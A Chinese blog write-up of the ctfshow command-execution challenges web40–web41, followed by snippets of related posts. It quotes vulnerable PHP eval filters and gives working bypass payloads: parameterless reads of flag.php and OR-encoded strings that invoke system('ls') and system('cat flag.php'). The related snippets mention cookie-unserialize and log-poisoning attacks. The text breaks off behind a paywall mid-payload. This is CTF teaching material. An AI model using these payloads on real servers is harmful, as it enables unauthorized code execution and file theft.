[ctfshow]web入门——命令执行(web40-web53)

最新推荐文章于 2025-04-10 16:30:21 发布
原创 最新推荐文章于 2025-04-10 16:30:21 发布
· 1.5k 阅读 · 1 ·
版权
不允许转载
文章标签:

#ctf #web #ctfshow

这篇博客详细介绍了CTF比赛中关于Web安全的一系列命令执行问题,从Web40到Web53,探讨了不同场景下如何绕过过滤机制,包括使用localeconv(), current(), array_reverse(), next()等函数,以及各种payload和绕过空格过滤的方法。同时提到了session和cookie可能存在的限制,并分享了大佬的通杀脚本链接。" 122226811,11312158,机器学习:从逻辑回归到XGBoost,"['机器学习', '深度学习', '算法', 'Python']

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

eval

web40

<?php
if(isset($_GET['c'])){
   
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
   
        eval($c);
    }
        
}else{
   
    highlight_file(__FILE__);
}

因为''等等被过滤了,相当于无参数rce

/?c=var_dump(scandir(current(localeconv())));

localeconv() 返回一包含本地数字及货币格式信息的数组,该数组第一个元素是.
current() 返回数组中的当前元素的值。每个数组中都有一个内部的指针指向它的"当前"元素,初始指向插入到数组中的第一个元素。

在这里插入图片描述
读文件

?c=show_source(next(array_reverse(scandir(pos(localeconv())))));

array_reverse()函数以相反的元素顺序返回数组
next() 将内部指针指向数组中的下一个元素

在这里插入图片描述
理论上开启session对话的方式应该也可以,但是平台最近被xss了?可能cookie不能整了


web41

<?php
if(isset($_POST['c'])){
   
    $c = $_POST['c'];
if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
   
        eval("echo($c);");
    }
}else{
   
    highlight_file(__FILE__);
}
?>

大佬写得通杀脚本
https://blog.youkuaiyun.com/miuzzx/article/details/108569080
[0-9]|[a-z]被过滤,所以应该是无数字字母的rce,$、+、-、^、~被过滤,所以用|

phpinfo

c=("%10%08%10%09%0e%06%0f"|"%60%60%60%60%60%60%60")()

在这里插入图片描述

//system('ls')
c=("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")("%0c%13"|"%60%60")
//system('cat flag.php')
c=("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")("%03%01%14%00%06%0c%01%07%00%10%08%10"|
最低0.47元/天 解锁文章
ctfshow web40-web60系统命令执行 wp
qq_56158055的博客
01-13 559
事先声明,本文只用来学习交流,不参与以任何商业形式的活动。本文不会出现flag。 web40 源码 发现过滤了所有数字,以及大部分的字符,但仔细观察可以发现,括号是中文的括号,因此我们可以利用这点,来进行无参RCE 可以利用p神的无参数RCE来做,利用localeconv()函数来做,也可以用异或和取反来做。 我这边用的是get_defined_vars()函数。 get_defined_vars():返回由所有已定义变量所组成的数组 因此我们可以 发现一堆乱七八糟的 利用
CTFshow 命令执行 web40
Kradress的博客
10-30 1930
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c = $_GET['c'];
CTFSHOW web入门——web40
m0_74093152的博客
04-24 692
并且这道题使用到了eval函数(返回传入字符的表达式的结果。即将字符串当成有效的表达式,进行运算、求值并返回结果。构造payload:?过滤了一堆符号,但过滤的括号是中文的括号,所以还是可以正常使用英文括号的。并post参数:b=system(''tac flag.php)可以使用套娃去获得flag.php文件的内容。
[ctfshow web入门] web40
最新发布
qq_50332504的博客
04-10 1016
怎么一下子多这么多过滤啊,我以为跳过了好几题这又能eval了,但是连也不能用了仔细观察,禁的是中文的括号,和英文括号没关系,所以我们用函数解决没有了?,所以打不出fla*或者fla?????了但是还可以用函数的返回值表示。
CTFWP】ctfshow-web40
LongL_GuYu的博客
07-30 1488
CTFWP:ctfshow-web40
ctf.show_web40(命令执行)
高高同学
03-01 787
web40无参数RCE绕过 源码 <?php if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){ eval($c); } }else{ highligh
[ctfshow]web入门——命令执行web72-web77)
ShenZ的博客
12-02 2739
ctfshow命令执行(web72-77)
[ctfshow]web入门——命令执行web54-web71)
ShenZ的博客
12-01 4458
文章目录web54 web54
[ctfshow]web入门——命令执行web118-web122+web124)
ShenZ的博客
02-28 4091
[ctfshow]web入门——命令执行 文章目录[ctfshow]web入门——命令执行web118web119web120web121web122web124 web118 源码里有提示 非法输入会有evil input fuzz一下发现可以用大写字母A-Z和${}~.?: # echo ${PWD} /root # echo ${PWD:0:1} #表示从0下标开始的第一个字符 / # echo ${PWD:~0:1} #从结尾开始往前的第一个字符
CTFshow web入门——文件上传
热门推荐
小元砸的博客
03-14 1万+
Web 151
ctfshow-web40(命令执行)
m0_62094846的博客
01-22 6267
current() prev() next() reset() end() <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer....
ctfshow-web入门-命令执行web37-web40
Welcome To Myon'Blog !
06-07 2428
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。将我们想要执行的代码包含进去,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。就会显示容器有问题了。我们也可以采用编码绕过,对
CTFshow 命令执行 web37-web40
m0_74312676的博客
10-06 1329
(5)将反转后的目录使用next函数,将flag.php文件输出,值得注意的是,我们这里输出的对象是文件,前面用到的print_r函数输出的对象是参数,于是我们这里就只能用show_source或者highlight_file。我们可以看到过滤了好多的符号,最重要的是单双引号,斜杠、逗号、以及$都过滤掉了,这意味着我们之前的哪些方法都用不了了。但是值得一提的是,这里过滤掉的是中文括号,英文括号并没有被过滤掉。有多种方式来实现,最常见的是利用hacker插件,将想要传输的参数,以post的方式传输。
ctfshow-web入门(29~40
1ance's blog
06-10 834
命令执行web29web30web31web32web33web34-36web37web38 web29 题目只过滤了关键词flag,用通配符即可绕过 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 官方题解: e
CTFShow-WEB入门命令执行详细Wp(29-40)
Aluxian_的博客
06-10 3240
【代码】CTFShow-WEB入门--命令执行详细Wp。
CTFshow-Web入门》04. Web 31~40
学习学习学习......
12-03 1277
eval() 利用与正则绕过,PHP 伪协议、include() 利用。
CTFshow web入门 web28~web40 命令执行
qq_56815564的博客
04-12 756
这里可以使用的是data伪协议 data://text/plain,这个相当于执行了php语句,后面跟上的 “.php” 因为前面的php语句已经闭合了,所以后面跟上的 “.php” 会被当成html页面直接显示在页面上,起不到什么作用。很明显,flag应该就在flag.php里,但不能直接访问flag.php 因为不能直接输入字符flag,被过滤了。而filter协议和php://input如果要传的话,必须出现具体的文件名,而flag被过滤了,所以不能用。另外这里的eval($c);
ctfshow-web入门——命令执行(1)(web29-web40
m0_62905745的博客
03-16 1145
本篇文章是ctfshowweb入门部分的命令执行部分wp(web29-web 40),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
ctfshow web40利用session进行rce
fmyyy1的博客
07-08 554
期末考考完了应该继续学习网安了。 之前一段时间去尝试挖cnvd,也是混到了自己的第一张cnvd证书,虽然是没有什么技术含量的洞,但也让我觉得很开心。放出来分享一下 但证书都是次要的,重要的是自己能力的提升。 之前买了ctfshow的vip题,遇到了一个之前不知道的trick,记录一下。 源码 <?php if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&amp
ctfshow web入门 代码审计 web303
01-04
### CTFShow Web 入门 代码审计 web303 解题思路 对于CTFShow平台上Web入门级代码审计题目web303,虽然具体细节未直接提及于提供的参考资料中,但从其他相似题目的解析中可以获得一些通用的解题方法和技术。 #### 题目背景理解 通常这类题目涉及的是对给定PHP或其他服务器端脚本语言编写的程序进行静态分析。目的是找出潜在的安全漏洞,比如SQL注入、命令执行、文件包含等常见问题[^1]。 #### 审计重点 - **输入验证不足**:检查是否存在未经充分过滤就使用的用户输入数据。 - **不安全的对象反序列化**:注意是否有对象被序列化存储在cookie或session中,并且这些对象会在后续操作里被反序列化处理[^3]。 - **弱加密算法应用不当**:如果涉及到加解密逻辑,则需评估所采用的方法是否足够强壮以及实现方式上有没有缺陷[^5]。 #### 实际案例模拟 假设`web303.php`中有如下片段: ```php <?php class User { public $role; } if (isset($_COOKIE['user'])) { $user = unserialize(base64_decode($_COOKIE['user'])); } else { setcookie('user', base64_encode(serialize(new User()))); } ``` 这段代码存在明显的安全隐患——它允许攻击者构造恶意payload并通过设置特定格式的Cookie来控制变量 `$user->role` 的值,进而可能获得管理员权限或者其他敏感功能访问权。 为了利用这一点,可以创建一个新的 `User` 类实例并将属性设为期望的状态(例如将角色更改为admin),之后将其序列化再经过Base64编码作为新的Cookie发送请求即可完成提权过程。 #### 测试与验证 使用Burp Suite之类的代理工具拦截HTTP流量,在Cookies部分修改对应项的内容为精心设计后的字符串表示形式,提交后观察响应变化确认漏洞的存在与否及其影响范围。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值